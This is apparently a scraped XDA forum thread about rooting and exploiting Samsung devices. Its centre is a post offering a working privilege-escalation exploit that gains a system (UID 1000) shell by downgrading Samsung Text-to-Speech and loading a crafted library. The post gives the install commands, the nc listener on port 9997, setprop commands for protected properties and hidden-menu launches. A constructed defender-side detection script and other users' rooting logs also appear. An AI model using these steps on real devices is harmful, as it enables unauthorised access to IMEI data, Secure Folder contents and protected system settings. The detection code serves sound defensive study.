-rwxrwxrwx 1 root root 154452 2023-01-27 04:21 su2
freshul:/system/bin # reboot



D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # cd /system/bin
freshul:/system/bin # ls -a1l su2
ls: su2: No such file or directory
1|freshul:/system/bin # exit
1|freshul:/ $ exit

D:\Android\adb>adb pull /sdcard .\dump
/sdcard/: 147 files pulled, 0 skipped. 2.6 MB/s (117491085 bytes in 42.623s)

D:\Android\adb>adb shell
freshul:/ $ su
freshul:/ # cd /sdcard
freshul:/sdcard # cp su2 /cache
freshul:/sdcard # cd /cache
freshul:/cache # ls -a1l su2
-rw------- 1 root root 154452 2023-01-27 04:48 su2
freshul:/cache # chmod 777 su2
freshul:/cache # ls -a1l su2
-rwxrwxrwx 1 root root 154452 2023-01-27 04:48 su2
freshul:/cache # /cache/su2 --help
su2: applet not found


Tried short again today...
On my Magisk rooted SM-R875F...

this time I only rebooted after copying su2 into /system/bin

su2 is gone...

I am now trying to check what is in the Log files... To find the "self cleaning"...

Also shortly tried the same su2 from the /cache folder, with the same result, I know...

Plan for next days... flash normal unmodified Original Stock Firmware... and check other Binaries in /cache folder with system user...

Best Regards
 
  • Like
Reactions: mohitgalaxy3

adfree

Senior Member
Jun 14, 2008
10,262
5,991
Samsung Galaxy Watch 4
Samsung Galaxy S22

What about lpflash...
Code:
lpflash writes a non-sparse image from lpmake to a block device. It is intended to be run on the device itself.

Usage: lpflash /dev/block/sdX /path/to/image/file

Maybe this could be useful... to prepare a modified super.img...

Maybe this bypass Combination Firmware "problem"...

I need only to bring super.img to my SM-R875F...

boot.img and recovery.img I can flash via Odin...

Best Regards
 

    THIS IS ACTIVELY IN DEVELOPMENT - Our goal is to make it more user friendly and easier to use, so please note things will change and updates will come at any given time, and there are almost certainly bugs to be found and encountered along the way during this, so if you find issues, just let us know here or in support chat, we are VERY active, and can usually get back to you in a few mins. I will be dynamically updating this post as things progress, keeping it up-to-date with our current progress.


    --UPDATED 01/20/2023: 1:20PM CST PROJECT VERSION 4.5 -- (Fixed Port issues) --

    Also confirmed working on Watch.. as mentioned, here.
    This is an EXPLOIT to get a System based shell (UID 1000) on ANY Samsung Mobile Device. No clue if or when it will be patched, but has worked on every single Samsung Device tested so far.
    THIS IS THE EQUIVALENT OF DOING su system but this DOES NOT invoke or need "su" in any way.
    This DOES NOT trip Knox.
    This DOES NOT give you ROOT (UID 0)

    This DOES NOT directly unlock your bootloader, although you may be able to find a way to do so using this exploit as a tool.
    If you use this for your own works, Please give credit.

    Next best thing to root on devices without BootLoader Unlock Option.


    Cool things that work:
    - Ability to cd to /data/fota and remove updates before they install
    - Access to most of /efs, /efs/imei, /efs/sec_efs, /efs/FactoryApp
    - Access to most of /data, /data/system, /data/user/0/ANY_SYSTEM_APP
    - The "Insthk" bin becomes usable
    - Secure Folder/Separated Apps become COMPLETELY compromised if you also install the POC in it (UID 150_system)
    - Start IOTHidden Menu, DM Mode, Service Mode, multiple debugging and hidden menus as well as preconfig in system context
    - Install and use DSU on a locked bootloader
    - Change many protected props, such as:
    Code:
    setprop persist.service.adb.root 1
    setprop service.adb.root 1
    setprop sys.hidden.otatest 1
    setprop sys.hiddenmenu.enable 1
    setprop persist.sys.knox.device_owner true
    setprop persist.sys.usb.qxdm.debug 1
    setprop sys.usb.qxdm.debug 1
    setprop presist.service.adb.enable 1
    setprop persist.sys.usb.qxdm.debug 1
    setprop service.adb.enable 1
    setprop persist.rollback.is_test true
    setprop sys.oem_unlock_allowed 1
    as well as quite a bit more.




    Note* You need to be on Wifi or Hotspot to set this up.



    It's fairly simple, a typical local privilege escalation.


    The Easy Way - Note, this could trigger some AVs due to embedded ADB and adb dlls, as mentioned in this comment.

    You may also find the source and prebuilts on my github, here.

    Step 1 - Download "Komraids System Shell.zip", (attached is the latest version) and extract anywhere on desktop. Install K0mraids POC.apk, open at least one time. Reboot.
    Step 2 - Ensure USB Debugging is ON, and computer is authorized. Also make sure power saving is OFF.
    Step 3 - When device is fully rebooted and unlocked, run systemshell.exe
    Step 4 - You should now be in a shell with UID 1000. Enjoy. Be careful with what you mess with.

    Things to note: The .exe only needs to be run once after each reboot, you can use it if you prefer, or if you are having issues here or want to manually open a system shell yourself, check out "How it works?" below.

    **You MUST downgrade SMT (Samsung TTS) on EVERY reboot**


    How it works? (stuff for security researchers, devs etc)



    Step 1 - Install the included "komraids_POC.apk" to the device and make sure to open it and let it load at least one time, then push the included "samsungTTSVULN2.apk" to /data/local/tmp (adb push samsungTTSVULN2.apk /data/local/tmp) -> chmod 777 /data/local/tmp/samsungTTSVULN2.apk >>> I advise disabling all battery optimizations for Samsung TTS and Shell, otherwise, it cuts off the shell from time to time.

    Step 2 - Make sure ADB is on, Device connected to wifi and authorized and all power saving is off (as mentioned above) Reboot device. This will load our lib on reboot since TTS loads all native libs on reboot.

    Step 4 - When device reboots, run this command from ADB. adb shell pm install -r -d -f -g --full --install-reason 3 --enable-rollback /data/local/tmp/samsungTTSVULN2.apk ---> it will return "Success" when done.

    Step 5 - Now, open two shells, (OR, see NOTE* below to use App Manager) in the first, do nc -lp 9997 & in the second, do am start -n com.samsung.SMT/.gui.DownloadList -> Look back at the first shell; it should have opened into a new system (UID 1000) shell.

    **You MUST downgrade SMT (Samsung TTS) on EVERY reboot**

    SMT has a receiver that blindly accepts stuff, so a carefully crafted apk (Our "komraids_POC_v1.5.apk") can trick it into loading our neat lib which opens a shell for us on localhost port 9997!

    SOURCE - on GitHub, here.
    Use logcat | grep -i mercury to debug if lib is loaded or not.
    NOTE: You can use something like AppManager, seen here, or another App installer/manager to launch the SMT activity in step 5, make a shortcut to it on your home screen for ease of access if you have issues, give this a go instead of using two shells, only use one for the nc -lp 9997 part and App Manager to launch the activity.





    You are now UID 1000. Enjoy.



    FAQ
    Why won't it connect/open the system shell?
    Various reasons can cause this, one of the most common is "Battery Optimizations", a form of power saving that can kill our apps. Power Saving is the number one issue for problems with this exploit. Second most common is, believe it or not, turning on ADB/WIFI. So make sure you either have a full battery and all power saving features are OFF, or are plugged in via USB.

    Next, make sure to FORCE stop everything and try to nc -lp and launch SMT again, I know it's annoying, but it's taken me many tries before.

    Clear Cache of SMT

    Uninstall PoC, Reboot, Re-install PoC, Reboot, Downgrade SMT.

    Why does this exist?
    Idk, it was supposed to have been patched back in 2019, obviously it wasn't sufficient.

    How do I prevent someone from hacking me with this?
    Simple, be Offensive, set it up and lock up the lib/port, once you're using this exploit, no others can because they can't load a second lib of the same. (the vuln is the lang packs for Samsung Text-to-speech) -- or, disable or remove Samsung Text-To-Speech.

    How do I use this in Termux or other Terminal Emulators?
    You will need to use the manual way, as described in Step 5 of "How it works?"

    I can't get it to work, can anyone help?
    Yes, post here or go to our Telegram Group for support, here (click me)

    Can this work with LSPosed/LSpatch?
    Yes, but it has its limitations currently. I've tested a few modules myself, some work, some don't.

    Will this work with Magisk or Shizuku?
    Yes, but it depends on @topjohnwu and @Rikka, respectively, to give the green light to me to incorporate this and post those here or post their compatible versions here on their own. I am open to working with them and have already seen and used a working Shizuku mod using this exploit, but out of respect for the developer and legality issues, I can't share that here.. HOWEVER, I do believe it is a good idea to get a manager for this built quickly if we plan on developing off of this.

    Will you share the source code?
    Yes, It is already on my GitHub, here.


    How do I open hidden stuff?
    For now, we will need to do it manually, so try these from the System shell
    This opens the IOTHidden menu
    am start -n com.sec.hiddenmenu/.IOTHiddenMenu -e 7267864872 72678647376477466
    This opens CID Managers "Preconfig"
    am start -n com.samsung.android.cidmanager/.modules.preconfig.PreconfigActivity -a com.samsung.android.action.SECRET_CODE -d secret_code://27262826 --ei type 2
    This opens the DM Mode on/off Toggle
    am start -n com.sec.hiddenmenu/.DmMode -e 7267864872 72678647376477466
    I'll add more interesting and useful commands/things to do as time goes on. Please do drop any cool things you find here!


    BACK STORY:
    It's full of drama and BS. I reported this to Samsung in October 2022, but they have decided this is GOOGLE'S problem and forgot to tell me their decision. LONG STORY CUT SHORT, between the time Samsung decided this was GOOGLE'S problem and them telling me of that decision, somehow, "another external security researcher" reported this exact thing to Google in the context it was their find. IDK who, nor do I really care at this point. It's done and over with, but stuff like this is what makes some security researchers ever hesitant to share their finds, even with the shady vendors/OEMs.

    Don't be dumb, I'm not responsible for any mistakes you make.


    Big shout out to @wr3cckl3ss1 and all the others for the help testing, debugging and the massive amount more done to help get this right. It was truly a team effort and nothing less than a labor of love & passion for cybersecurity and learning. I learned more during this project with you guys than I can express.

    Huge thanks to @oakieville for the .exe and a lot of help tweaking the code of this project.


    This project was brought to you by VAULT-TEC Dev Ops!
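    A defender-side check, added here and not part of K0mraid3's project or this thread: it scans logcat, `ss -lntp` and `dumpsys package` text for the indicators the post above names (the SMT DownloadList activity started from the adb shell uid, the "mercury" library log line, a listener on port 9997, and an SMT versionCode below a recorded baseline). Every sample line and version number below is constructed; a real check would feed it `adb shell` output.

```python
import re

# Constructed logcat excerpt (not captured from a real device) reproducing the
# indicators described in the post: SMT's DownloadList activity launched from the
# adb shell uid (2000) and the "mercury" library announcing itself in the TTS process.
SAMPLE_LOGCAT = """\
01-20 13:20:01.101  1234  1250 I ActivityManager: START u0 {cmp=com.samsung.SMT/.gui.DownloadList} from uid 2000
01-20 13:20:01.455  4321  4321 D mercury: loaded native lib, listening on 127.0.0.1:9997
01-20 13:20:02.000  1234  1250 I ActivityManager: START u0 {cmp=com.android.settings/.Settings} from uid 1000
"""

# Constructed `ss -lntp` style output; 9997 is the localhost port the post names.
SAMPLE_LISTENERS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      5      127.0.0.1:9997    0.0.0.0:*
LISTEN 0      128    0.0.0.0:5555      0.0.0.0:*
"""

# Constructed `dumpsys package com.samsung.SMT` fragment; the versionCode is a placeholder.
SAMPLE_DUMPSYS = """\
Package [com.samsung.SMT] (abc123):
    userId=10120
    versionCode=3000100 minSdk=29 targetSdk=33
"""

SMT_ACTIVITY = "com.samsung.SMT/.gui.DownloadList"
SHELL_PORT = 9997
ADB_SHELL_UID = 2000


def find_indicators(logcat: str, listeners: str) -> list:
    """Return (indicator_name, line) pairs for every suspicious line found."""
    hits = []
    for line in logcat.splitlines():
        if "START" in line and SMT_ACTIVITY in line:
            m = re.search(r"from uid (\d+)", line)
            # the post's manual route launches the activity from the adb shell, not the system
            if m and int(m.group(1)) == ADB_SHELL_UID:
                hits.append(("smt_activity_started_from_shell", line))
        if "mercury" in line.lower():  # same string the post greps for
            hits.append(("mercury_lib_loaded", line))
    for line in listeners.splitlines():
        if line.startswith("LISTEN") and re.search(rf":{SHELL_PORT}\s", line):
            hits.append(("listener_on_9997", line))
    return hits


def smt_version_code(dumpsys: str) -> int:
    m = re.search(r"versionCode=(\d+)", dumpsys)
    return int(m.group(1)) if m else -1


def smt_downgraded(dumpsys: str, baseline_version_code: int) -> bool:
    """True when the installed SMT is older than the version recorded at last audit."""
    return 0 <= smt_version_code(dumpsys) < baseline_version_code
```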
    6
    ***Moderator Announcement***

    Flaming and disrespect will absolutely not be tolerated. Repeated violations may result in account bans. Compliance with all XDA Forum Rules and Policies is MANDATORY for all members. While you're free to discuss the technical details and merits of this exploit, as well as the wisdom in deferring updates, you WILL treat each other with respect and dignity, and those who fail to do so will no longer be permitted to participate on XDA.

    In addition, keep your posts ON TOPIC.

    If you feel someone's posts violate the Forum Rules, use the Report button and let the moderator staff handle it before it becomes an issue.

    Don't make us get involved again.
    5
    Yup, goes back to the age old issue, how do you manipulate that prop? SEM Factory app has something called GRDM, that mentions bootloader, I really want to see if there's anything worthwhile in there too.
    If you know how, throw SEM Factory app in JADX, you'll see what I mean.

    This prop is parsed by init at boot from /proc/cmdline, so it is set by the bootloader itself:
    C:
    #if defined(CONFIG_SECURE_DEVELOPER_MODE)
        add_cmdline("androidboot.other.locked=%d", 1);
    #endif

    Even if you guys find a way to spoof the prop (the only possible way imo is via resetprop) and show the OEM Unlock toggle, it must be assured that the bootloader itself also supports OEM Unlocking, newer Samsung devices with SVB also require unlocking the bootloader via Download Mode since the OEM Lock flag is now stored in RPMB. I don't have much knowledge about USA variants so take my suggestions with a grain of salt
    5
    I'm sorry but I don't get you. Can I root my device with this method?
    It's a system shell, UID 1000; it is not root.
    5
    USE AT OWN RISK....
    What worked for me...might not for you....


    How to load up a "DSU" on your device using System Shell and NO BL unlock.

    (See pics as needed)

    For me on my S22 Ultra S908U1, what I did was....execute both activities in STEP 1 AND 2. Then when it said it was ready, I hit restart in the notification. And presto.....now I loaded a replica DSU of my existing firmware. So yes, while it's not a GSI or DSU of your choosing....you still have a DSU. The main focus is that NOTIFICATION....it's what takes you to and from your regular firmware and that DSU. As long as you don't DISCARD IT.....it should come back through reboots. This goes for the DSU as well. Word of warning....the DSU I did get loaded up...was pretty much packed with a ton of stuff. And locked up all the space I had. 8GB. I ended up removing pretty much all packages. Except Play Services....Play Store....and a few other packages. Another warning....the one downside to all of this is IF YOU do this and want the benefits of this...going back and forth.... YOUR FACE AND FINGERPRINT will always end up being corrupted.

    In SYSTEM SHELL execute and then follow prompts

    Step 1: am start -n com.android.dynsystem/.VerificationActivity

    Step 2: am start -n com.android.settings/.development.DSULoader